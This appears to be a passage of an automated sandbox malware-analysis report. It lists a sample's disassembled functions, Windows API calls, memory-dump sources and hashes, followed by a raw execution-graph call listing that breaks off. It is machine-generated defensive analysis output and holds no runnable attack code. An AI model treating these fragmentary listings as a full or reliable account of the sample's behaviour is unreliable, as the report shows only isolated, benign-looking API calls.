                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                • String ID: Version
                                                                                                                                                                                                                                                                • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                • String ID: !N~
                                                                                                                                                                                                                                                                • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                • String ID: Error launching installer
                                                                                                                                                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                                                                                                                • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:3.4%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:3.7%
                                                                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                                                                Total number of Limit Nodes:58
                                                                                                                                                                                                                                                                execution_graph 104989 a71ac5 104990 a71acd 104989->104990 104992 a2d535 104989->104992 105020 a87a87 8 API calls __fread_nolock 104990->105020 104995 a4014b 8 API calls 104992->104995 104993 a71adf 105021 a87a00 8 API calls __fread_nolock 104993->105021 104997 a2d589 104995->104997 104996 a71b09 104998 a30340 207 API calls 104996->104998 105000 a2c32d 8 API calls 104997->105000 104999 a71b30 104998->104999 105001 a71b44 104999->105001 105022 aa61a2 53 API calls _wcslen 104999->105022 105003 a2d5b3 105000->105003 105004 a4014b 8 API calls 105003->105004 105012 a2d66e ISource 105004->105012 105005 a71b61 105005->104992 105023 a87a87 8 API calls __fread_nolock 105005->105023 105007 a2c3ab 8 API calls 105017 a2d9ac ISource 105007->105017 105008 a2bed9 8 API calls 105008->105012 105011 a71f79 105025 a856ae 8 API calls ISource 105011->105025 105012->105008 105012->105011 105013 a71f94 105012->105013 105015 a2c3ab 8 API calls 105012->105015 105016 a2d911 ISource 105012->105016 105024 a2b4c8 8 API calls 105012->105024 105015->105012 105016->105007 105016->105017 105018 a2d9c3 105017->105018 105019 a3e30a 8 API calls ISource 105017->105019 105019->105017 105020->104993 105021->104996 105022->105005 105023->105005 105024->105012 105025->105013 105026 a2f4c0 105029 a3a025 105026->105029 105028 a2f4cc 105030 a3a046 105029->105030 105035 a3a0a3 105029->105035 105032 a30340 207 API calls 105030->105032 105030->105035 105036 a3a077 105032->105036 105033 a7806b 105033->105033 105034 a3a0e7 105034->105028 105035->105034 105038 a93fe1 81 API calls __wsopen_s 105035->105038 105036->105034 105036->105035 105037 a2bed9 8 API calls 105036->105037 105037->105035 105038->105033 105039 a21044 105044 a22793 105039->105044 105041 a2104a 105080 a40413 29 API calls __onexit 105041->105080 105043 a21054 105081 a22a38 105044->105081 105048 a2280a 105049 a2bf73 8 API calls 105048->105049 105050 a22814 105049->105050 105051 a2bf73 8 API calls 105050->105051 105052 a2281e 105051->105052 105053 a2bf73 8 API calls 105052->105053 105054 a22828 105053->105054 105055 a2bf73 8 API calls 105054->105055 105056 a22866 105055->105056 105057 a2bf73 8 API calls 105056->105057 105058 a22932 105057->105058 105091 a22dbc 105058->105091 105062 a22964 105063 a2bf73 8 API calls 105062->105063 105064 a2296e 105063->105064 105065 a33160 9 API calls 105064->105065 105066 a22999 105065->105066 105118 a23166 105066->105118 105068 a229b5 105069 a229c5 GetStdHandle 105068->105069 105070 a639e7 105069->105070 105071 a22a1a 105069->105071 105070->105071 105072 a639f0 105070->105072 105075 a22a27 OleInitialize 105071->105075 105073 a4014b 8 API calls 105072->105073 105074 a639f7 105073->105074 105125 a90ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 105074->105125 105075->105041 105077 a63a00 105126 a912eb CreateThread 105077->105126 105079 a63a0c CloseHandle 105079->105071 105080->105043 105127 a22a91 105081->105127 105084 a22a91 8 API calls 105085 a22a70 105084->105085 105086 a2bf73 8 API calls 105085->105086 105087 a22a7c 105086->105087 105088 a28577 8 API calls 105087->105088 105089 a227c9 105088->105089 105090 a2327e 6 API calls 105089->105090 105090->105048 105092 a2bf73 8 API calls 105091->105092 105093 a22dcc 105092->105093 105094 a2bf73 8 API calls 105093->105094 105095 a22dd4 105094->105095 105134 a281d6 105095->105134 105098 a281d6 8 API calls 105099 a22de4 105098->105099 105100 a2bf73 8 API calls 105099->105100 105101 a22def 105100->105101 105102 a4014b 8 API calls 105101->105102 105103 a2293c 105102->105103 105104 a23205 105103->105104 105105 a23213 105104->105105 105106 a2bf73 8 API calls 105105->105106 105107 a2321e 105106->105107 105108 a2bf73 8 API calls 105107->105108 105109 a23229 105108->105109 105110 a2bf73 8 API calls 105109->105110 105111 a23234 105110->105111 105112 a2bf73 8 API calls 105111->105112 105113 a2323f 105112->105113 105114 a281d6 8 API calls 105113->105114 105115 a2324a 105114->105115 105116 a4014b 8 API calls 105115->105116 105117 a23251 RegisterWindowMessageW 105116->105117 105117->105062 105119 a23176 105118->105119 105120 a63c8f 105118->105120 105122 a4014b 8 API calls 105119->105122 105137 a93c4e 8 API calls 105120->105137 105124 a2317e 105122->105124 105123 a63c9a 105124->105068 105125->105077 105126->105079 105138 a912d1 14 API calls 105126->105138 105128 a2bf73 8 API calls 105127->105128 105129 a22a9c 105128->105129 105130 a2bf73 8 API calls 105129->105130 105131 a22aa4 105130->105131 105132 a2bf73 8 API calls 